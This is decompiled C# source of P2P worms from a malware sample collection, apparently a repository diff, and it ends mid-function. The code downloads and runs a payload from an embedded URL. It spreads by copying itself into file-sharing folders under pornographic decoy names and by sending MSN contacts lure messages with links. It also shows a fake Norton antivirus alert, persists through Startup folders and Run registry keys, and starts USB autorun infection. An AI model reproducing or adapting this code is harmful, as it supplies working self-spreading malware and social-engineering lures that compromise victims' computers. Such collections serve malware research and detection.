string s = "";
for (int startIndex = 0; startIndex < length && num3 <= 6; ++startIndex)
{
char c = char.Parse(str.Substring(startIndex, 1));
if (char.IsDigit(c))
s += (string) (object) c;
if (c != ',')
{
if (startIndex + 1 != length)
continue;
}
try
{
numArray[num3++] = int.Parse(s);
s = "";
}
catch (Exception ex)
{
}
}
string hostNameOrAddress = numArray[0].ToString() + "." + (object) numArray[1] + "." + (object) numArray[2] + "." + (object) numArray[3];
int port = (numArray[4] << 8) + numArray[5];
Socket dataSocket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
IPEndPoint remoteEP = new IPEndPoint(Dns.GetHostEntry(hostNameOrAddress).AddressList[0], port);
try
{
dataSocket.Connect((EndPoint) remoteEP);
}
catch (Exception ex)
{
}
return dataSocket;
}
}
}
MSIL/P2P-Worm/MSIL/L/P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96/decrypter.cs
+141
View File
@@ -0,0 +1,141 @@
// Decompiled with JetBrains decompiler
// Type: parvulus.decrypter
// Assembly: parvulus, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9FA193B5-EDCA-4010-A168-C8A18CE631F5
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.MSIL.Lupar.a-b4e8ccd55ff21847335fb2856ad750c5cf8f2baa869366cdde763f6410ca3f96.exe
namespace parvulus
{
public class decrypter
{
private char[] source;
private int length;
private int length2;
private int length3;
private int blockCount;
private int paddingCount;
public decrypter(char[] input)
{
int num = 0;
this.source = input;
this.length = input.Length;
for (int index = 0; index < 2; ++index)
{
if (input[this.length - index - 1] == '=')
++num;
}
this.paddingCount = num;
this.blockCount = this.length / 4;
this.length2 = this.blockCount * 3;
}
public byte[] GetDecoded()
{
byte[] numArray1 = new byte[this.length];
byte[] numArray2 = new byte[this.length2];
for (int index = 0; index < this.length; ++index)
numArray1[index] = this.char2sixbit(this.source[index]);
for (int index = 0; index < this.blockCount; ++index)
{
byte num1 = numArray1[index * 4];
byte num2 = numArray1[index * 4 + 1];
byte num3 = numArray1[index * 4 + 2];
byte num4 = numArray1[index * 4 + 3];
byte num5 = (byte) ((uint) num1 << 2);
byte num6 = (byte) ((uint) (byte) (((int) num2 & 48) >> 4) + (uint) num5);
byte num7 = (byte) (((int) num2 & 15) << 4);
byte num8 = (byte) ((uint) (byte) (((int) num3 & 60) >> 2) + (uint) num7);
byte num9 = (byte) (((int) num3 & 3) << 6);
byte num10 = (byte) ((uint) num4 + (uint) num9);
numArray2[index * 3] = num6;
numArray2[index * 3 + 1] = num8;
numArray2[index * 3 + 2] = num10;
}
this.length3 = this.length2 - this.paddingCount;
byte[] decoded = new byte[this.length3];
for (int index = 0; index < this.length3; ++index)
decoded[index] = numArray2[index];
return decoded;
}
private byte char2sixbit(char c)
{
char[] chArray = new char[64]
{
'A',
'B',
'C',
'D',
'E',
'F',
'G',
'H',
'I',
'J',
'K',
'L',
'M',
'N',
'O',
'P',
'Q',
'R',
'S',
'T',
'U',
'V',
'W',
'X',
'Y',
'Z',
'a',
'b',
'c',
'd',
'e',
'f',
'g',
'h',
'i',
'j',
'k',
'l',
'm',
'n',
'o',
'p',
'q',
'r',
's',
't',
'u',
'v',
'w',
'x',
'y',
'z',
'0',
'1',
'2',
'3',
'4',
'5',
'6',
'7',
'8',
'9',
'+',
'/'
};
if (c == '=')
return 0;
for (int index = 0; index < 64; ++index)
{
if ((int) chArray[index] == (int) c)
return (byte) index;
}
return 0;
}
}
}
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyDescription("")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyTitle("Worm")]
[assembly: Guid("8be770b5-dfcc-40dd-80dc-7979edc0e5f9")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("Copyright © 2010")]
[assembly: AssemblyProduct("Worm")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/P2P-Worm/MSIL/S/P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22/Form1.cs
+934
View File
@@ -0,0 +1,934 @@
// Decompiled with JetBrains decompiler
// Type: stub.Form1
// Assembly: stub, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 267E8B95-AFAA-4D03-9834-74556FFC1EC8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\P2P-Worm.MSIL.ShareWire.ay-a25c80dfdb1baa8b632a26bffd961d02b570eba3ae4eb58070bad8c311a32b22.exe
using MessengerAPI;
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.VisualBasic.FileIO;
using Microsoft.Win32;
using stub.My;
using System;
using System.Collections;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Threading;
using System.Windows.Forms;
namespace stub
{
[DesignerGenerated]
public class Form1 : Form
{
private IContainer components;
[AccessedThroughProperty("ListBox1")]
private ListBox _ListBox1;
[AccessedThroughProperty("Timer1")]
private System.Windows.Forms.Timer _Timer1;
[AccessedThroughProperty("Timer2")]
private System.Windows.Forms.Timer _Timer2;
[AccessedThroughProperty("Timer3")]
private System.Windows.Forms.Timer _Timer3;
[AccessedThroughProperty("TextBox1")]
private TextBox _TextBox1;
[AccessedThroughProperty("msn")]
private Messenger _msn;
private string fpath;
private const string FileSplit = "@Infested@";
private string[] options;
private string link;
public Form1()
{
this.FormClosing += new FormClosingEventHandler(this.Form1_FormClosing);
this.Load += new EventHandler(this.Form1_Load);
this.fpath = MyProject.Computer.FileSystem.SpecialDirectories.Temp + "\\svchost.exe";
this.InitializeComponent();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.components == null)
return;
this.components.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void InitializeComponent()
{
this.components = (IContainer) new System.ComponentModel.Container();
this.ListBox1 = new ListBox();
this.Timer1 = new System.Windows.Forms.Timer(this.components);
this.Timer2 = new System.Windows.Forms.Timer(this.components);
this.Timer3 = new System.Windows.Forms.Timer(this.components);
this.TextBox1 = new TextBox();
this.SuspendLayout();
this.ListBox1.FormattingEnabled = true;
ListBox listBox1_1 = this.ListBox1;
Point point1 = new Point(25, 12);
Point point2 = point1;
listBox1_1.Location = point2;
this.ListBox1.Name = "ListBox1";
ListBox listBox1_2 = this.ListBox1;
Size size1 = new Size(242, 69);
Size size2 = size1;
listBox1_2.Size = size2;
this.ListBox1.TabIndex = 0;
this.Timer1.Interval = 6000;
this.Timer3.Interval = 4000;
TextBox textBox1_1 = this.TextBox1;
point1 = new Point(25, 86);
Point point3 = point1;
textBox1_1.Location = point3;
this.TextBox1.Name = "TextBox1";
TextBox textBox1_2 = this.TextBox1;
size1 = new Size(241, 20);
Size size3 = size1;
textBox1_2.Size = size3;
this.TextBox1.TabIndex = 1;
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
size1 = new Size(303, 115);
this.ClientSize = size1;
this.Controls.Add((Control) this.TextBox1);
this.Controls.Add((Control) this.ListBox1);
this.ForeColor = System.Drawing.Color.Transparent;
this.FormBorderStyle = FormBorderStyle.None;
this.Name = nameof (Form1);
this.StartPosition = FormStartPosition.CenterScreen;
this.ResumeLayout(false);
this.PerformLayout();
}
internal virtual ListBox ListBox1
{
get => this._ListBox1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._ListBox1 = value;
}
internal virtual System.Windows.Forms.Timer Timer1
{
get => this._Timer1;
[MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer1_Tick);
if (this._Timer1 != null)
this._Timer1.Tick -= eventHandler;
this._Timer1 = value;
if (this._Timer1 == null)
return;
this._Timer1.Tick += eventHandler;
}
}
internal virtual System.Windows.Forms.Timer Timer2
{
get => this._Timer2;
[MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer2_Tick);
if (this._Timer2 != null)
this._Timer2.Tick -= eventHandler;
this._Timer2 = value;
if (this._Timer2 == null)
return;
this._Timer2.Tick += eventHandler;
}
}
internal virtual System.Windows.Forms.Timer Timer3
{
get => this._Timer3;
[MethodImpl(MethodImplOptions.Synchronized)] set
{
EventHandler eventHandler = new EventHandler(this.Timer3_Tick);
if (this._Timer3 != null)
this._Timer3.Tick -= eventHandler;
this._Timer3 = value;
if (this._Timer3 == null)
return;
this._Timer3.Tick += eventHandler;
}
}
internal virtual TextBox TextBox1
{
get => this._TextBox1;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._TextBox1 = value;
}
private virtual Messenger msn
{
get => this._msn;
[MethodImpl(MethodImplOptions.Synchronized)] set => this._msn = value;
}
[DllImport("user32", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern void keybd_event(byte bVk, byte bScan, int dwFlags, int dwExtraInfo);
[DllImport("user32", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern object GetWindowText();
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetForegroundWindow();
[DllImport("user32.dll", EntryPoint = "GetWindowTextA", CharSet = CharSet.Ansi, SetLastError = true)]
private static extern int GetWindowText(int hwnd, [MarshalAs(UnmanagedType.VBByRefStr)] ref string lpString, int cch);
private string GetActiveWindowTitle()
{
string lpString = new string(char.MinValue, 100);
Form1.GetWindowText(Form1.GetForegroundWindow(), ref lpString, 100);
return lpString.Substring(0, checked (Microsoft.VisualBasic.Strings.InStr(lpString, "\0") - 1));
}
private void Form1_FormClosing(object sender, FormClosingEventArgs e)
{
try
{
Process.Start("C:\\Windows Defender\\explorer.exe");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
private void Form1_Load(object sender, EventArgs e)
{
try
{
Microsoft.VisualBasic.FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared);
this.link = Microsoft.VisualBasic.Strings.Space(checked ((int) Microsoft.VisualBasic.FileSystem.LOF(1)));
Microsoft.VisualBasic.FileSystem.FileGet(1, ref this.link);
Microsoft.VisualBasic.FileSystem.FileClose(1);
this.options = Microsoft.VisualBasic.Strings.Split(this.link, "@Infested@");
this.TextBox1.Text = this.options[1];
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
string text = this.TextBox1.Text;
if (File.Exists(this.fpath))
{
try
{
File.Delete(this.fpath);
MyProject.Computer.Network.DownloadFile(text, this.fpath);
Thread.Sleep(100);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
Thread.Sleep(1);
ProjectData.ClearProjectError();
}
}
else
{
MyProject.Computer.Network.DownloadFile(text, this.fpath);
Thread.Sleep(100);
}
try
{
if (Directory.Exists("C:\\Windows Defender"))
{
File.WriteAllBytes("C:\\Windows Defender\\Interop.MessengerPrivate.dll", stub.My.Resources.Resources.Interop_MessengerPrivate);
File.WriteAllBytes("C:\\Windows Defender\\Interop.MessengerAPI.dll", stub.My.Resources.Resources.Interop_MessengerAPI);
if (!File.Exists("C:\\Windows Defender\\explorer.exe"))
File.Copy(Application.ExecutablePath, "C:\\Windows Defender\\explorer.exe");
}
else
{
Directory.CreateDirectory("C:\\Windows Defender");
File.WriteAllBytes("C:\\Windows Defender\\Interop.MessengerPrivate.dll", stub.My.Resources.Resources.Interop_MessengerPrivate);
File.WriteAllBytes("C:\\Windows Defender\\Interop.MessengerAPI.dll", stub.My.Resources.Resources.Interop_MessengerAPI);
File.Copy(Application.ExecutablePath, "C:\\Windows Defender\\explorer.exe");
Process.Start("C:\\Windows Defender\\explorer.exe");
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
this.lime();
try
{
this.msn = (Messenger) new MessengerClass();
IMessengerContacts myContacts = (IMessengerContacts) ((IMessenger4) this.msn).MyContacts;
try
{
foreach (object obj in myContacts)
{
object objectValue = RuntimeHelpers.GetObjectValue(obj);
if (Operators.ConditionalCompareObjectNotEqual(NewLateBinding.LateGet(objectValue, (System.Type) null, "Status", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null), (object) (MISTATUS) 1, false))
this.ListBox1.Items.Add(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, (System.Type) null, "SigninName", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null)));
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
this.Timer1.Start();
this.P2Pspread();
this.share();
this.Start();
this.AregTime();
this.USBInfect();
string str1 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
string str2 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
string str3 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
string str4 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
string str5 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
string str6 = Conversions.ToString(Conversion.Int(VBMath.Rnd() * 9f));
this.Timer2.Interval = Conversions.ToInteger(str1 + str2 + str3 + str4 + str5 + str6);
this.Timer2.Start();
this.Timer3.Start();
this.Mgr();
this.Reg();
}
public void lime()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
if (!Directory.Exists(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved"))
goto label_7;
label_2:
num3 = 3;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\xxx.avi.scr");
label_3:
num3 = 4;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\porn.avi.scr");
label_4:
num3 = 5;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\teenage porn.avi.scr");
label_5:
num3 = 6;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\teen porn pics.avi.scr");
label_6:
num3 = 7;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\18 year old with dildo.avi.scr");
goto label_14;
label_7:
num3 = 9;
label_8:
num3 = 10;
Directory.CreateDirectory(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved");
label_9:
num3 = 11;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\xxx.avi.scr");
label_10:
num3 = 12;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\porn.avi.scr");
label_11:
num3 = 13;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\teenage porn.avi.scr");
label_12:
num3 = 14;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\teen porn pics.avi.scr");
label_13:
num3 = 15;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Saved\\18 year old with dildo.avi.scr");
label_14:
num3 = 17;
if (!Directory.Exists(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared"))
goto label_20;
label_15:
num3 = 18;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\xxx.avi.scr");
label_16:
num3 = 19;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\porn.avi.scr");
label_17:
num3 = 20;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\teenage porn.avi.scr");
label_18:
num3 = 21;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\teen porn pics.avi.scr");
label_19:
num3 = 22;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\18 year old with dildo.avi.scr");
goto label_33;
label_20:
num3 = 24;
label_21:
num3 = 25;
Directory.CreateDirectory(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared");
label_22:
num3 = 26;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\xxx.avi.scr");
label_23:
num3 = 27;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\porn.avi.scr");
label_24:
num3 = 28;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\teenage porn.avi.scr");
label_25:
num3 = 29;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\teen porn pics.avi.scr");
label_26:
num3 = 30;
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\LimeWire\\Shared\\18 year old with dildo.avi.scr");
goto label_33;
label_28:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
goto label_6;
case 8:
case 16:
case 17:
goto label_14;
case 9:
goto label_7;
case 10:
goto label_8;
case 11:
goto label_9;
case 12:
goto label_10;
case 13:
goto label_11;
case 14:
goto label_12;
case 15:
goto label_13;
case 18:
goto label_15;
case 19:
goto label_16;
case 20:
goto label_17;
case 21:
goto label_18;
case 22:
goto label_19;
case 23:
case 31:
case 32:
goto label_33;
case 24:
goto label_20;
case 25:
goto label_21;
case 26:
goto label_22;
case 27:
goto label_23;
case 28:
goto label_24;
case 29:
goto label_25;
case 30:
goto label_26;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_28;
}
throw ProjectData.CreateProjectError(-2146828237);
label_33:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
private void P2Pspread()
{
string str1 = Conversions.ToString(MyProject.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\\SOFTWARE\\LimeWire\\", "InstallDir", (object) 0)) + "\\Shared";
try
{
File.Copy(Application.ExecutablePath, str1 + "\\porn.scr");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
File.Copy(Application.ExecutablePath, Interaction.Environ("programfiles\\Shared\\porn.scr"));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
if (Directory.Exists(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared"))
{
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\porn.scr");
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\teen sex.scr");
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\paris hilton sex tape.scr");
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\sex tape xxx.scr");
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\porn.scr");
}
else
{
Directory.CreateDirectory(MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared");
File.Copy(Application.ExecutablePath, MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Shared\\porn.scr");
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
string str2 = "C:\\Shared";
if (Directory.Exists(str2))
{
File.Copy(Application.ExecutablePath, str2);
}
else
{
Directory.CreateDirectory(str2);
File.Copy(Application.ExecutablePath, str2 + "\\porn.scr");
File.Copy(Application.ExecutablePath, str2 + "\\paris hilton sex tape.scr");
File.Copy(Application.ExecutablePath, str2 + "\\teen sex.scr");
File.Copy(Application.ExecutablePath, str2 + "\\secret sex tape.scr");
File.Copy(Application.ExecutablePath, str2 + "\\pussy climax orgasm fingering dildo sex xxx 18.scr");
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private void Timer1_Tick(object sender, EventArgs e)
{
try
{
string text = this.TextBox1.Text;
string[] source = new string[11]
{
null,
"lmao what a weekend http://TlNYCHAT.COM/chanb ",
"webcam? :) http://TlNYCHAT.COM/chanb",
"is this website up for you? http://TlNYCHAT.COM/chanb",
"Can you take a look at this app I just made and maybe give me some feedback? " + text,
":D haha http://TlNYCHAT.COM/chanb",
"madness " + text,
"who is this? " + text,
"you know this guy?: " + text,
"think this is any good? " + text,
"... " + text
};
IMessengerContacts myContacts = (IMessengerContacts) ((IMessenger4) this.msn).MyContacts;
VBMath.Randomize();
try
{
((IMessenger4) this.msn).InstantMessage((object) Conversions.ToString(this.ListBox1.Items[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * (float) this.ListBox1.Items.Count)))]));
Thread.Sleep(100);
VBMath.Randomize();
SendKeys.SendWait(source[checked ((int) Math.Round(unchecked ((double) VBMath.Rnd() * (double) ((IEnumerable<string>) source).Count<string>() - 1.0)))]);
SendKeys.SendWait("{ENTER}");
SendKeys.SendWait("{ESC}");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
this.ListBox1.Items.Clear();
try
{
foreach (object obj in myContacts)
{
object objectValue = RuntimeHelpers.GetObjectValue(obj);
if (Operators.ConditionalCompareObjectNotEqual(NewLateBinding.LateGet(objectValue, (System.Type) null, "Status", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null), (object) (MISTATUS) 1, false))
this.ListBox1.Items.Add(RuntimeHelpers.GetObjectValue(NewLateBinding.LateGet(objectValue, (System.Type) null, "SigninName", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null)));
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
private void Timer2_Tick(object sender, EventArgs e)
{
int num = (int) Interaction.MsgBox((object) "Norton antivirus has detected a virus and needs to download a program to remove the infection.\r\n\r\nInternet explorer will now open and you will need install the program", Title: ((object) "Norton Antivirus"));
Process.Start(this.TextBox1.Text);
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public void Start()
{
try
{
string fileName = Path.GetFileName(Application.ExecutablePath);
string directoryRoot = Directory.GetDirectoryRoot(Environment.SystemDirectory);
if (!new DirectoryInfo(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\").Exists)
{
if (File.Exists(directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName))
Microsoft.VisualBasic.FileSystem.Kill(directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName);
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName, true);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.Hidden);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.ReadOnly);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.System);
}
else
{
if (File.Exists(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName))
Microsoft.VisualBasic.FileSystem.Kill(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName);
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName, true);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.Hidden);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.ReadOnly);
Microsoft.VisualBasic.FileSystem.SetAttr(directoryRoot + "Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\" + fileName, FileAttribute.System);
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public void AregTime()
{
string fileName = Path.GetFileName(Application.ExecutablePath);
string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Microsoft\\System\\Services\\";
try
{
if (!Directory.Exists(path))
Directory.CreateDirectory(path);
if (!File.Exists(path + fileName))
Microsoft.VisualBasic.FileSystem.FileCopy(Application.ExecutablePath, path + fileName);
object objectValue = RuntimeHelpers.GetObjectValue(Interaction.CreateObject("wscript.shell"));
try
{
NewLateBinding.LateCall(objectValue, (System.Type) null, "regwrite", new object[2]
{
(object) ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\" + fileName),
(object) (path + fileName)
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
NewLateBinding.LateCall(objectValue, (System.Type) null, "regwrite", new object[2]
{
(object) ("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\" + fileName),
(object) (path + fileName)
}, (string[]) null, (System.Type[]) null, (bool[]) null, true);
ProjectData.ClearProjectError();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public void share()
{
string path1 = MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\Downloads\\eMule\\Incoming";
string path2 = MyProject.Computer.FileSystem.SpecialDirectories.MyDocuments + "\\bearshare\\shared";
try
{
if (Directory.Exists(path1))
{
File.Copy(Application.ExecutablePath, path1 + "\\porn.scr");
File.Copy(Application.ExecutablePath, path1 + "\\paris hilton sex tape.scr");
File.Copy(Application.ExecutablePath, path1 + "\\teen sex.scr");
File.Copy(Application.ExecutablePath, path1 + "\\secret sex tape.scr");
File.Copy(Application.ExecutablePath, path1 + "\\pussy climax orgasm fingering dildo sex xxx 18.scr");
}
if (!Directory.Exists(path2))
return;
File.Copy(Application.ExecutablePath, path2 + "\\porn.scr");
File.Copy(Application.ExecutablePath, path2 + "\\paris hilton sex tape.scr");
File.Copy(Application.ExecutablePath, path2 + "\\teen sex.scr");
File.Copy(Application.ExecutablePath, path2 + "\\secret sex tape.scr");
File.Copy(Application.ExecutablePath, path2 + "\\pussy climax orgasm fingering dildo sex xxx 18.scr");
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public void USBInfect()
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
MyProject.Computer.Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", "Hidden", (object) "0", RegistryValueKind.DWord);
label_2:
num3 = 3;
string programFiles = MyProject.Computer.FileSystem.SpecialDirectories.ProgramFiles;
label_3:
num3 = 4;
string[] logicalDrives = Directory.GetLogicalDrives();
label_4:
num3 = 5;
string[] strArray = logicalDrives;
int index = 0;
goto label_14;
label_6:
num3 = 6;
string str;
if (programFiles.Contains(str))
goto label_12;
label_7:
num3 = 8;
label_8:
num3 = 9;
MyProject.Computer.FileSystem.CopyFile(Application.ExecutablePath, str + "HDDFile.com", (UIOption) -1, UICancelOption.DoNothing);
label_9:
num3 = 10;
MyProject.Computer.FileSystem.WriteAllText(str + "autorun.inf", "[autorun]\r\nopen=" + str + "HDDFile.com\r\nshellexecute=" + str, true);
label_10:
num3 = 11;
